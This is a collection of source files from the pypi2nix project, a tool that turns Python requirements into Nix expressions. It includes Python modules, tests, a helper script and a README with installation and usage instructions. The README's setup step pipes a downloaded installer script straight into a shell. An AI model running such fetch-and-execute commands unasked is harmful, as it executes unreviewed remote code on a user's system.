"length_bytes": 8804, "license_type": "no_license", "max_line_length": 93, "num_lines": 253, "path": "/src/pypi2nix/pip/implementation.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os.path\nimport shlex\nimport shutil\nimport sys\nimport urllib.parse\nfrom typing import Any\nfrom typing import Dict\nfrom typing import List\nfrom typing import Optional\n\nimport click\n\nfrom pypi2nix.external_dependencies import ExternalDependency\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.nix import EvaluationFailed\nfrom pypi2nix.nix import Nix\nfrom pypi2nix.path import Path\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirement_set import RequirementSet\nfrom pypi2nix.target_platform import TargetPlatform\nfrom pypi2nix.utils import NixOption\nfrom pypi2nix.utils import escape_double_quotes\n\nfrom .interface import Pip\n\nHERE = os.path.dirname(__file__)\nDOWNLOAD_NIX = os.path.join(HERE, \"download.nix\")\nWHEEL_NIX = os.path.join(HERE, \"wheel.nix\")\nINSTALL_NIX = os.path.join(HERE, \"install.nix\")\nBASE_NIX = os.path.join(HERE, \"base.nix\")\n\n\nclass NixPip(Pip):\n def __init__(\n self,\n nix: Nix,\n project_directory: Path,\n extra_build_inputs: List[ExternalDependency],\n extra_env: str,\n wheels_cache: List[str],\n target_platform: TargetPlatform,\n logger: Logger,\n requirement_parser: RequirementParser,\n ):\n self.nix = nix\n self.project_directory = project_directory\n self.extra_build_inputs = extra_build_inputs\n self.extra_env = extra_env\n self.build_output: str = \"\"\n self.wheels_cache = wheels_cache\n self.target_platform = target_platform\n self.logger = logger\n self.requirement_parser = requirement_parser\n\n output = self.nix.evaluate_expression(\n 'let pkgs = import <nixpkgs> {}; in \"%s\"' % escape_double_quotes(extra_env)\n )\n # trim 
quotes\n self.extra_env = output[1:-1]\n\n self.default_lib_directory = self.project_directory / \"lib\"\n self.download_cache_directory = self.project_directory / \"cache\"\n\n def download_sources(\n self, requirements: RequirementSet, target_directory: Path\n ) -> None:\n if not requirements:\n return\n requirements_files = [\n requirements.to_file(\n str(self.project_directory),\n self.target_platform,\n self.requirement_parser,\n self.logger,\n ).processed_requirements_file_path()\n ]\n self.build_from_nix_file(\n command=\"exit\",\n file_path=DOWNLOAD_NIX,\n nix_arguments=self.nix_arguments(\n requirements_files=requirements_files,\n destination_directory=target_directory,\n editable_sources_directory=self.editable_sources_directory(),\n build_directory=self.build_directory(),\n ),\n )\n\n def build_wheels(\n self,\n requirements: RequirementSet,\n target_directory: Path,\n source_directories: List[Path],\n ) -> None:\n if not requirements:\n return\n requirements_files = [\n requirements.to_file(\n str(self.project_directory),\n self.target_platform,\n self.requirement_parser,\n self.logger,\n ).processed_requirements_file_path()\n ]\n self.build_from_nix_file(\n command=\"exit\",\n file_path=WHEEL_NIX,\n nix_arguments=self.nix_arguments(\n wheels_cache=self.wheels_cache,\n requirements_files=requirements_files,\n editable_sources_directory=self.editable_sources_directory(),\n build_directory=self.build_directory(),\n wheels_dir=target_directory,\n sources=source_directories,\n ),\n )\n\n def install(\n self,\n requirements: RequirementSet,\n source_directories: List[Path],\n target_directory: Optional[Path] = None,\n ) -> None:\n if not requirements:\n return\n if target_directory is None:\n target_directory = self.default_lib_directory\n requirements_files = [\n requirements.to_file(\n str(self.project_directory),\n self.target_platform,\n self.requirement_parser,\n self.logger,\n ).processed_requirements_file_path()\n ]\n self.build_from_nix_file(\n command=\"exit\",\n file_path=INSTALL_NIX,\n nix_arguments=self.nix_arguments(\n requirements_files=requirements_files,\n target_directory=target_directory,\n sources_directories=source_directories,\n ),\n )\n\n def freeze(self, python_path: List[Path] = []) -> str:\n additional_paths = \":\".join(shlex.quote(str(path)) for path in python_path)\n\n output: str = self.nix.shell(\n \"{PYTHONPATH} pip freeze\".format(\n PYTHONPATH=\"PYTHONPATH=\" + additional_paths + ':\"$PYTHONPATH\"'\n if python_path\n else \"\"\n ),\n BASE_NIX,\n nix_arguments=self.nix_arguments(),\n )\n lines = map(lambda x: x.strip(), output.splitlines())\n return (\"\\n\".join(lines) + \"\\n\") if lines else \"\"\n\n def editable_sources_directory(self) -> Path:\n return self.project_directory / \"editable_sources\"\n\n def build_directory(self) -> Path:\n return self.project_directory / \"build\"\n\n def nix_arguments(self, **arguments: NixOption) -> Dict[str, NixOption]:\n return dict(\n dict(\n download_cache_dir=str(self.download_cache_directory),\n extra_build_inputs=[\n input.attribute_name() for input in self.extra_build_inputs\n ],\n project_dir=str(self.project_directory),\n python_version=self.target_platform.nixpkgs_python_version.derivation_name(),\n extra_env=self.extra_env,\n ),\n **arguments,\n )\n\n def build_from_nix_file(\n self, file_path: str, command: str, nix_arguments: Any\n ) -> None:\n self.create_download_cache_if_missing()\n self.delete_build_directory()\n try:\n self.build_output = self.nix.shell(\n command=command, 
derivation_path=file_path, nix_arguments=nix_arguments\n )\n except EvaluationFailed as error:\n if error.output is not None:\n self.build_output += error.output\n is_failure = True\n else:\n is_failure = False\n self.handle_build_error(is_failure=is_failure)\n\n def create_download_cache_if_missing(self) -> None:\n self.download_cache_directory.ensure_directory()\n\n def delete_build_directory(self) -> None:\n try:\n shutil.rmtree(str(self.build_directory()))\n except FileNotFoundError:\n pass\n\n def handle_build_error(self, is_failure: bool) -> None:\n if not is_failure:\n if not self.build_output.endswith(\n \"ERROR: Failed to build one or more wheels\"\n ):\n return\n\n self.logger.error(self.build_output)\n\n message = \"While trying to run the command something went wrong.\"\n\n # trying to recognize the problem and provide more meanigful error\n # message\n no_matching_dist = \"No matching distribution found for \"\n if no_matching_dist in self.build_output:\n dist_name = self.build_output[\n self.build_output.find(no_matching_dist) + len(no_matching_dist) :\n ]\n dist_name = dist_name[: dist_name.find(\" (from\")]\n message = (\n \"Most likely `%s` package does not have source (zip/tar.bz) \"\n \"distribution.\" % dist_name\n )\n\n else:\n try:\n self.send_crash_report()\n except OSError:\n self.logger.error(\"Failed to send crash report\")\n\n raise click.ClickException(message)\n\n def send_crash_report(self) -> None:\n if click.confirm(\n \"Do you want to report above issue (a browser \"\n \"will open with prefilled details of issue)?\"\n ):\n title = \"Error when running pypi2nix command\"\n body = \"# Description\\n\\n<detailed description of error \"\n \"here>\\n\\n\"\n body += \"# Traceback \\n\\n```bash\\n\"\n body += \"% pypi2nix --version\\n\"\n body += \"% pypi2nix \" + \" \".join(sys.argv[1:]) + \"\\n\"\n body += self.build_output + \"\\n```\\n\"\n click.launch(\n \"https://github.com/nix-community/pypi2nix/issues/new?%s\"\n % (urllib.parse.urlencode(dict(title=title, body=body)))\n )\n" }, { "alpha_fraction": 0.6240947842597961, "alphanum_fraction": 0.6240947842597961, "avg_line_length": 25.189655303955078, "blob_id": "bc402778da96498fb632fd10f73579843bb8a3b6", "content_id": "14e6244712eb7da45604ec2282dc401c0656a25c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1519, "license_type": "no_license", "max_line_length": 86, "num_lines": 58, "path": "/src/pypi2nix/project_directory.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import tempfile\nfrom abc import ABCMeta\nfrom abc import abstractmethod\nfrom sys import stderr\nfrom types import TracebackType\nfrom typing import Optional\nfrom typing import Type\n\n\nclass ProjectDirectory(metaclass=ABCMeta):\n @abstractmethod\n def __enter__(self) -> str:\n pass\n\n @abstractmethod\n def __exit__(\n self,\n exc_type: Optional[Type],\n exc_value: Optional[Exception],\n traceback: Optional[TracebackType],\n ) -> None:\n pass\n\n\nclass TemporaryProjectDirectory(ProjectDirectory):\n def __init__(self) -> None:\n self.temporary_directory = tempfile.TemporaryDirectory()\n\n def __enter__(self) -> str:\n return self.temporary_directory.__enter__()\n\n def __exit__(\n self,\n exc_type: Optional[Type],\n exc_value: Optional[Exception],\n traceback: Optional[TracebackType],\n ) -> None:\n return self.temporary_directory.__exit__(exc_type, exc_value, traceback)\n\n\nclass PersistentProjectDirectory(ProjectDirectory):\n def __init__(self, path: str) -> 
None:\n self.path = path\n\n def __enter__(self) -> str:\n print(\n \"WARNING: You have specified the `--build-directory OPTION`.\", file=stderr\n )\n print(\"WARNING: It is recommended to not use this flag.\", file=stderr)\n return self.path\n\n def __exit__(\n self,\n exc_type: Optional[Type],\n exc_value: Optional[Exception],\n traceback: Optional[TracebackType],\n ) -> None:\n pass\n" }, { "alpha_fraction": 0.6816552877426147, "alphanum_fraction": 0.6890532970428467, "avg_line_length": 33.8128776550293, "blob_id": "368941d30e45d019f20ae3091c3b65648338055d", "content_id": "4a85893a4224bca2ebae5a4f3e275e1dd421f7ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 17302, "license_type": "no_license", "max_line_length": 114, "num_lines": 497, "path": "/README.rst", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "pypi2nix - generate Nix expressions for Python packages\n=======================================================\n\n.. contents::\n\nSee https://pypi2nix.readthedocs.io/en/latest/ for documentation.\n\n.. inclusion-marker\n\n``pypi2nix`` is a command line tool that generates `Nix expressions`_ from\ndifferent ``requirements.txt``. This is useful for:\n\n- Building a Nix derivation for a program written in Python as part of\n packaging it.\n\n- Setting up a development environment to hack on a program written in Python.\n\n The only way we can fix bugs with pypi2nix is if you report them. Please\n create an issue if you discover problems.\n\n``pypi2nix`` will (until further notice) only work with latest *unstable*\nchannel. This is due to ongoing changes in Python infrastructure happening in\nNixpkgs.\n\nThe `Nixpkgs manual section about Python\n<https://nixos.org/nixpkgs/manual/#python>`_ makes good reading if you\nhaven't seen it already.\n\n1. Installation\n---------------\n\n``pypi2nix`` is part of ``nixpkgs``. If you just want to use\n``pypi2nix`` on your system, it is recommended that you install it via\nthe regular means, e.g. ``nix-env -iA nixos.pypi2nix`` on NixOS or\n``nix-env -iA nixpkgs.pypi2nix`` on other systems utilizing nix.\n\nSystem Requirements\n^^^^^^^^^^^^^^^^^^^\n\nMake sure Nix is installed::\n\n % curl https://nixos.org/nix/install | sh\n\nCurrently ``pypi2nix`` is only tested against ``linux`` systems.\nSupported ``nixpkgs`` channels are ``nixos-19.09`` and\n``nixos-unstable``. Due to the nature of ``nixos-unstable`` the\noccasional breakage of ``pypi2nix`` is to be expected. We try to\nprovide fixes in that regard in a timely manner.\n\n\nAd hoc Installation (Simple)\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nFor just installing the package with a command, use `nix-env`_::\n\n nix-env -if https://github.com/nix-community/pypi2nix/tarball/master\n\nDeclarative Installation (Advanced)\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nIf you prefer to explicitly declare each installed package in your\nNix(OS) or project configuration, you can do the following:\n\nFirst, import the package from its ``default.nix`` by fetching the\nwhole git repository with ``pkgs.fetchgit``. Afterwards you can just\nadd the imported attribute the list of installed software.\n\nBelow you find an example for NixOS' ``configuration.nix``. 
Other\nmethods like `home-manager`_ work similarly::\n\n let\n pypi2nix = import (pkgs.fetchgit {\n url = \"https://github.com/nix-community/pypi2nix\";\n # adjust rev and sha256 to desired version\n rev = \"v2.0.1\";\n sha256 = \"sha256:0mxh3x8bck3axdfi9vh9mz1m3zvmzqkcgy6gxp8f9hhs6qg5146y\";\n }) {};\n in\n environment.systemPackages = [\n # your other packages\n pypi2nix\n ];\n\n\n\n2. Usage\n--------\n\nThe easiest way to generate Nix expressions is to invoke::\n\n % pypi2nix -e packageA -e packageB==0.1\n\nIf you also have a ``requirements.txt`` file for your Python project you can use\nthe ``-r`` option.\n\n::\n\n % pypi2nix -e packageA -e packageB==0.1 \\\n -r requirements.txt -r requirements-dev.txt\n\n\nWhat is being generated\n^^^^^^^^^^^^^^^^^^^^^^^\n\nOption ``-V`` tells pypi2nix which python version to use. To see which\nPython versions are available consult ``pypi2nix --help``.\n\nOnce Nix expressions are generated you should be able to see 3 new files:\n\n- ``requirements_frozen.txt`` - full frozen set for your pypi2nix call.\n This is the output you would expect from ``pip freeze``.\n\n- ``requirements.nix`` is a file which contains a nix expression for the package set that was built.\n\n- ``requirements_override.nix`` - this is an empty file which lets you\n override generated nix expressions.\n\n\nBuilding generated packages\n^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nBuild one package::\n\n % nix build -f requirements.nix packages.empy\n\nBuild all packages::\n\n % nix build -f requirements.nix packages\n\nBuild python interpreter with all packages loaded::\n\n % nix build -f requirements.nix interpreter\n % ./result/bin/python -c \"import empy\"\n\nEnter development environment::\n\n % nix run -f requirements.nix interpreter\n [user@localhost:~/dev/nixos/pypi2nix) % python -c \"import empy\"\n\n\nUsing generated packages\n^^^^^^^^^^^^^^^^^^^^^^^^\n\nIf you are working on a project where its dependencies are defined in\n``requirements.txt`` then you can create a ``default.nix`` and add generated\npackages as ``buildInputs``, as demonstrated here::\n\n {}:\n let\n python = import ./requirements.nix { inherit pkgs; };\n in python.mkDerivation {\n name = \"ProjectA-1.0.0\";\n src = ./.;\n buildInputs = [\n python.packages.\"coverage\"\n python.packages.\"flake8\"\n python.packages.\"mock\"\n python.packages.\"pytest\"\n python.packages.\"pytest-asyncio\"\n python.packages.\"pytest-cov\"\n python.packages.\"pytest-mock\"\n python.packages.\"pytest-xdist\"\n python.packages.\"virtualenv\"\n ];\n propagatedBuildInputs = [\n python.packages.\"aiohttp\"\n python.packages.\"arrow\"\n python.packages.\"defusedxml\"\n python.packages.\"frozendict\"\n python.packages.\"jsonschema\"\n python.packages.\"taskcluster\"\n python.packages.\"virtualenv\"\n ];\n ...\n }\n\n\nAs you can see you can access all packages via ``python.packages.\"<name>\"``. If\nyou want to depend on *all* packages you can even do::\n\n\n propagatedBuildInputs = builtins.attrValues python.packages;\n\nCommand line options\n^^^^^^^^^^^^^^^^^^^^\n\n``-v``\n Increase amount and detail of information output to the user.\n Verbosity levels are ``ERROR``, ``WARNING``, ``INFO`` and\n ``DEBUG`` in that order. The default verbosity is ``INFO``.\n\n``-q``\n Reduce amount and detail of information output to the user. 
See\n ``-v`` for more information.\n\n``-I/--nix-path TEXT``\n Add entries to the ``NIX_PATH`` environment variable similarly to\n how ``-I`` works with ``nix`` executables like ``nix-build``.\n This can be useful for generating package sets based on a\n different ``nixpkgs`` version than the one used on the local\n system.\n\n``--nix-shell PATH``\n Path to an alternative version of the ``nix-shell`` command. The\n default is the first executable that will be found in the current\n ``PATH`` of the system.\n\n``--version``\n Show the current version of ``pypi2nix``.\n\n``--basename TEXT``\n This option determines the name of the produced files. So with\n ``--basename environment`` you would get the files\n ``environment.nix``, ``environment_frozen.nix`` and\n ``environment_override.nix``.\n\n``--extra-build-inputs/-E TEXT``\n Extra build inputs that the required python packages need to run,\n e.g. ``libffi`` or ``libgl``. In that case you would provide ``-E\n \"libffi libgl\"``. These nix packages will be available in the\n build environment for the wheels.\n\n``--emit-extra-build-inputs/--no-emit-extra-build-inputs``\n These options let you control if external build dependencies\n specified via ``-E`` will end up in the generated nix package set.\n Please note that if you select this option, your overrides need to\n make sure that python packages find their respective external\n dependencies.\n\n``--extra-env/-N TEXT``\n Extra environment variables that will be passed to the build\n environment. Note that you can use nix expressions in this\n string, e.g. ``-N 'BERKELEYDB_DIR=${pkgs.db.dev}'``.\n\n``--enable-tests/-T``\n Specify this flag if you want to enable the check phase of all\n packages in the generated nix expression. Please note that this\n feature is highly experimental and will probably not work for your\n use case.\n\n``--python-version/-V``\n Specify the python version you want the requirement set to be\n built with. The default is ``3`` which translates to the\n ``python3`` derivation of ``nixpkgs``.\n\n``--requirements/-r FILE``\n Specify a requirements file, just as you would with ``pip``.\n ``pypi2nix`` tries to be fully compatible with the file format of\n ``pip``.\n\n``--editable/-e TEXT``\n This option allows you to specify individual requirements that get\n added to the requirement set, e.g. ``pypi2nix -e attrs``,\n ``pypi2nix -e $HOME/src/myproject#egg=myproject`` or ``pypi2nix -e .#egg=myegg``.\n\n``--setup-requires/-s TEXT``\n Allows you to specify python packages that need to be present in\n the build environment of other packages, a good example of this\n would be ``setuptools-scm``. Note that ``pypi2nix`` tries to\n detect these dependencies on its own. You only need to specify\n this flag in cases where a package author or maintainer forgot to\n mention build time dependencies in their setup or neither\n ``setup.cfg`` nor ``pyproject.toml`` is used.\n\n``--overrides/-O URL``\n Allows you to specify additional overrides that conform to the\n general structure of ``requirements_override.nix``. We support\n regular URLs with ``http`` and ``https`` scheme and also ``git``.\n An example for using ``https`` would be ``pypi2nix -O\n https://myoverrides.test/overrides.nix``. Reusing an overlay from\n a git repository would be done like so: ``pypi2nix -O\n git+https://github.com/nix-community/pypi2nix.git&path=requirement_override.nix``.\n Please keep in mind that these overrides are incorporated in a nix\n expression with a precalculated hash value. 
So if the file\n changes upstream your generated package can not be built anymore.\n\n``--default-overrides/--no-default-overrides``\n Pull in overrides from\n ``https://github.com/nix-community/pypi2nix-overrides``. This\n feature is enabled by default.\n\n``--wheels-cache/-W TEXT``\n A location where prebuilt wheels can be found. This option will\n ultimately be passed to ``pip --find-links``. Only point to\n wheels that are built through ``pypi2nix`` on your own or a very\n similar system.\n\n``--build-directory TEXT``\n **Warning** A bug in ``pypi2nix`` currently prevents some packages\n from being built with this option set. It is recommended to not\n use this flag.\n\n The directory where pypi2nix would build the python environment to\n generate the desired nix expression. If not specified, the build\n directory will be temporary and is deleted before the program\n exits.\n\n``--dependency-graph-output PATH``\n Output the dependency information of processed packages to the\n specified path. The output format is yaml.\n\n\n3. When it doesn't work\n-----------------------\n\nI hope nobody is expecting ``pypi2nix`` to always do a perfect job. In Python\npackaging, there are just too many different cases that we will never be able to\ncover. What ``pypi2nix`` tries to do is to get you very close.\n\nSometimes ``pypi2nix`` fails entirely. If this happens, open a bug --\nit's almost always a bug in ``pypi2nix``. However, sometimes\n``pypi2nix`` succeeds but the resulting ``requirements.nix`` file\nfails during the building of your Python package. Depending on what\nthe problem is, this section may be helpful.\n\nNon-Python/system dependencies\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nQuite a few Python packages require non-Python dependencies to be\npresent at build time. These packages will fail to build with error\nmessages about not being able to find ``foo.h`` or some ``fooconfig``\nfile. To work around this, ``pypi2nix`` has ``-E`` options which can\nbe used to include extra non-Python dependencies.\n\nFor example, ``psycopg2`` requires the ``pg_config`` binary to be present at installation time::\n\n % pypi2nix -v -V 2.7 -e psycopg2 -E postgresql\n\n``lxml`` requires the ``libxml2`` and ``libxslt`` system packages::\n\n % pypi2nix -v -V 2.7 -e lxml -E libxml2 -E libxslt\n\n\nAdditional environment variables\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nSome packages expect additional environment variables to be set::\n\n % pypi2nix -v -V 2.7 -e bsddb3 -N 'BERKELEYDB_DIR=${pkgs.db.dev}'\n\n\nUsing requirements_override.nix\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nSome other failures might be caused because the derivation that\n``pypi2nix`` wrote was incomplete. A very common situation is that\n``pypi2nix`` didn't include all the dependencies of some package. As\nan example, ``execnet`` depends on ``setuptools-scm``, but\n``pypi2nix`` may not detect this.\n\nWhen this happens, Nix will fail to build ``execnet``, perhaps with an\nerror message from distutils/setuptools complaining that it can't find\na distribution for ``setuptools-scm``. What's happening here is that\nnormally ``execnet`` would fetch ``setuptools-scm`` from PyPI, but Nix\ndisables network access to guarantee reproducibility. So when you\nbuild ``execnet``, it fails to find ``setuptools-scm``.\n\nFor these situations, ``pypi2nix`` provides a\n``requirements_override.nix`` file, which lets you override anything\nthat it generated. 
You can even add new packages to the dependency set\nthis way.\n\nAs an example, let's add ``setuptools-scm`` as a build-time dependency\nof ``execnet``. Here's the ``requirements_override.nix``::\n\n { pkgs, python }:\n\n self: super: {\n\n \"execnet\" = python.overrideDerivation super.\"execnet\" (old: {\n buildInputs = old.buildInputs ++ [ self.\"setuptools-scm\" ];\n });\n\n }\n\n\nIn a similar way, you can add or remove any Python package.\n\nShared overrides\n^^^^^^^^^^^^^^^^\n\nIn addition to the empty autogenerated ``requirements_overrides.nix``\nfile, you can include pre-existing overrides files. These overrides\nwill be included the same way as your ``requirements_overrides.nix``.\n\nThe ``pypi2nix`` author also maintains a set of \"default\" overrides at\nhttps://github.com/nix-community/pypi2nix-overrides/blob/master/overrides.nix --\nyou can include these by using the ``--default-overrides`` argument to\n``pypi2nix``. These overrides are designed in such a way that they\nonly override dependencies that were already present in your\n``requirements.nix``.\n\nYou can also include an overrides file using the ``-O`` command line\nargument. ``pypi2nix`` can fetch these overrides from a local file or\nover certain common protocols.\n\n``http`` and ``https``\n ``pypi2nix --overrides https://raw.githubusercontent.com/nix-community/pypi2nix-overrides/master/overrides.nix``\n\n Note that the generated Nix expression will check if contents of\n the overrides file differs from when the Nix expression was built, and\n fail if this was the case (or the file does not exist anymore).\n\nLocal files\n ``pypi2nix --override ../some/relative/path --override /some/absolute/path``\n\nGit repositories\n ``pypi2nix --override git+https://github.com/nix-community/pypi2nix.git#path=overrides.nix``\n\n If you want to import a file from a specific git repository you have\n to prefix its URL with ``git+``, quite similar to how you would do\n in a ``requirements.txt`` file for ``pip``.\n\n4. Advanced Use\n---------------\n\nCreating default.nix for your project\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nNothing speaks better than an example::\n\n { }:\n\n let\n pkgs = import <nixpkgs> {};\n python = import ./requirements.nix { inherit pkgs; };\n in python.mkDerivation {\n name = \"projectA-1.0.0\";\n src = ./.;\n buildInputs = [\n python.packages.\"coverage\"\n python.packages.\"flake8\"\n python.packages.\"mock\"\n python.packages.\"pytest\"\n python.packages.\"pytest-asyncio\"\n python.packages.\"pytest-cov\"\n python.packages.\"pytest-mock\"\n python.packages.\"pytest-xdist\"\n ];\n propagatedBuildInputs = [\n python.packages.\"aiohttp\"\n python.packages.\"arrow\"\n python.packages.\"defusedxml\"\n python.packages.\"frozendict\"\n python.packages.\"jsonschema\"\n ];\n checkPhase = ''\n export NO_TESTS_OVER_WIRE=1\n export PYTHONDONTWRITEBYTECODE=1\n\n flake8 src/\n py.test --cov=src -cov-report term-missing\n coverage html\n '';\n }\n\n\nImportant to know here is that you instantiate all generated packages\nas ``python = import ./requirements.nix { inherit pkgs; };`` which\ngives you a Python environment with all the packages generated by\n``pypi2nix`` as well as some common utilities.\n\nTo create a package you use ``python.mkDerivation`` which works like\nthe ``pythonPackages.buildPythonPackage`` function in ``nixpkgs``. All\ngenerated packages are available as one attribute set under\n``python.packages``.\n\n.. 
TODO explain withPackages and show some example\n\nOne of future goals of ``pypi2nix`` project is to also improve the UX of our\nPython tooling in nixpkgs. While this is very hard to do within ``nixpkgs`` it\nis almost trivial to experiment with this outside ``nixpkgs``.\n\n\nConvert generated requirements.nix into nixpkgs overlay\n^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\nA working example is worth 1000 words.\n\noverlay.nix::\n\n self: super:\n {\n customPython =\n (import ./requirements.nix { pkgs = self; });\n }\n\nshell.nix::\n\n with (import <nixpkgs> { overlays = [ (import ./overlay.nix) ]; });\n customPython.interpreter\n\n\n.. _`Nix expressions`: http://nixos.org/nix/manual/#chap-writing-nix-expressions\n.. _`examples/Makefile`: https://github.com/nix-community/pypi2nix/blob/master/examples/Makefile\n.. _`nix-env`: http://nixos.org/nix/manual/#sec-nix-env\n.. _`home-manager`: https://github.com/rycee/home-manager\n" }, { "alpha_fraction": 0.5053078532218933, "alphanum_fraction": 0.5180467367172241, "avg_line_length": 17.115385055541992, "blob_id": "8a343cbc3c3a3ec792e8acdcb825ad5e8fe64506", "content_id": "1de067bd6a708c7763eee3c0bc859b3da7f13450", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 471, "license_type": "permissive", "max_line_length": 50, "num_lines": 26, "path": "/unittests/test_memoize.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from pypi2nix.memoize import memoize\n\n\ndef test_memoized_method_returns_correct_result():\n class A:\n @memoize\n def x(self):\n return 1\n\n assert A().x() == 1\n\n\ndef test_memoized_method_gets_called_only_once():\n class A:\n def __init__(self):\n self.times_called = 0\n\n @memoize\n def x(self):\n self.times_called += 1\n return\n\n a = A()\n a.x()\n a.x()\n assert a.times_called == 1\n" }, { "alpha_fraction": 0.7237762212753296, "alphanum_fraction": 0.7237762212753296, "avg_line_length": 30.77777862548828, "blob_id": "1c1dbceb34a075bb42e02dc44002043cf742f9dd", "content_id": "93fb6ce295f138d3f43f085654fd578ee715aeec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 286, "license_type": "no_license", "max_line_length": 54, "num_lines": 9, "path": "/integrationtests/test_relative_paths.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from .framework import IntegrationTest\n\n\nclass RelativePathsTestCase(IntegrationTest):\n name_of_testcase = \"relative_paths\"\n requirements = [\"test_package/.#egg=test_package\"]\n\n def requirements_file_check(self, content):\n self.assertIn(\"src = test_package/.\", content)\n" }, { "alpha_fraction": 0.4964176118373871, "alphanum_fraction": 0.4984646737575531, "avg_line_length": 19.35416603088379, "blob_id": "2e14df28374790694479c635bc8f01c39d119a6b", "content_id": "403d72852cb8c9e48cd74dd94eafb2ee080231a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 977, "license_type": "no_license", "max_line_length": 65, "num_lines": 48, "path": "/scripts/update_dependencies.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport argparse\nimport subprocess\n\nfrom repository import ROOT\n\n\ndef main():\n arguments = parse_arguments()\n subprocess.run(\n [\n \"pypi2nix\",\n \"-r\",\n \"requirements.txt\",\n \"-r\",\n \"requirements-dev.txt\",\n \"-s\",\n \"pytest-runner\",\n \"-s\",\n \"setupmeta\",\n 
\"--no-default-overrides\",\n \"-E\",\n \"openssl libffi\",\n ]\n + ([\"-v\"] if arguments.verbose else []),\n cwd=ROOT,\n check=True,\n )\n\n\ndef parse_arguments():\n argument_parser = argparse.ArgumentParser(\n description=\"Update development dependencies of pypi2nix\"\n )\n argument_parser.add_argument(\n \"--verbose\",\n \"-v\",\n help=\"Print debugging output\",\n default=False,\n action=\"store_true\",\n )\n args = argument_parser.parse_args()\n return args\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5133278369903564, "alphanum_fraction": 0.5196482539176941, "avg_line_length": 28.34677505493164, "blob_id": "8413106e49e20a1335506db1be236a86727da90d", "content_id": "2af91289bdcf7bfebe7a26e16dcb2113d1196ff8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3639, "license_type": "no_license", "max_line_length": 86, "num_lines": 124, "path": "/src/pypi2nix/package_source.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os.path\nfrom typing import Dict\nfrom typing import Optional\nfrom typing import Union\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.utils import prefetch_git\nfrom pypi2nix.utils import prefetch_hg\nfrom pypi2nix.utils import prefetch_url\n\nPackageSource = Union[\"GitSource\", \"HgSource\", \"PathSource\", \"UrlSource\"]\n\n\nclass GitSource:\n def __init__(self, url: str, revision: Optional[str] = None):\n self.url = url\n self._prefetch_data: Optional[Dict[str, str]] = None\n self._revision = revision\n\n def nix_expression(self) -> str:\n return \"\\n\".join(\n [\n \"pkgs.fetchgit {\",\n ' url = \"%(url)s\";',\n ' %(hash_type)s = \"%(hash_value)s\";',\n ' rev = \"%(rev)s\";',\n \" }\",\n ]\n ) % dict(\n url=self.url,\n hash_type=\"sha256\",\n hash_value=self.hash_value(),\n rev=self.revision(),\n )\n\n def hash_value(self) -> str:\n return self.prefetch_data()[\"sha256\"]\n\n def revision(self) -> str:\n return self.prefetch_data()[\"rev\"]\n\n def prefetch_data(self) -> Dict[str, str]:\n if self._prefetch_data is None:\n self._prefetch_data = prefetch_git(self.url, self._revision)\n return self._prefetch_data\n\n\nclass HgSource:\n def __init__(\n self, url: str, logger: Logger, revision: Optional[str] = None\n ) -> None:\n self.url = url\n self._revision = revision\n self._prefetch_data: Optional[Dict[str, str]] = None\n self.logger = logger\n\n def nix_expression(self) -> str:\n return \"\\n\".join(\n [\n \"pkgs.fetchhg {{\",\n ' url = \"{url}\";',\n ' sha256 = \"{hash_value}\";',\n ' rev = \"{revision}\";',\n \" }}\",\n ]\n ).format(url=self.url, hash_value=self.hash_value(), revision=self.revision())\n\n def hash_value(self) -> str:\n return self.prefetch_data()[\"sha256\"]\n\n def revision(self) -> str:\n return self.prefetch_data()[\"revision\"]\n\n def prefetch_data(self) -> Dict[str, str]:\n if self._prefetch_data is None:\n self._prefetch_data = prefetch_hg(self.url, self.logger, self._revision)\n return self._prefetch_data\n\n\nclass UrlSource:\n def __init__(\n self, url: str, logger: Logger, hash_value: Optional[str] = None\n ) -> None:\n self.url = url\n self._hash_value = hash_value\n self.chunk_size = 2048\n self.logger = logger\n\n def nix_expression(self) -> str:\n return \"\\n\".join(\n [\n \"pkgs.fetchurl {{\",\n ' url = \"{url}\";',\n ' sha256 = \"{hash_value}\";',\n \"}}\",\n ]\n ).format(url=self.url, hash_value=self.hash_value())\n\n def hash_value(self) -> str:\n if self._hash_value is None:\n self._hash_value = 
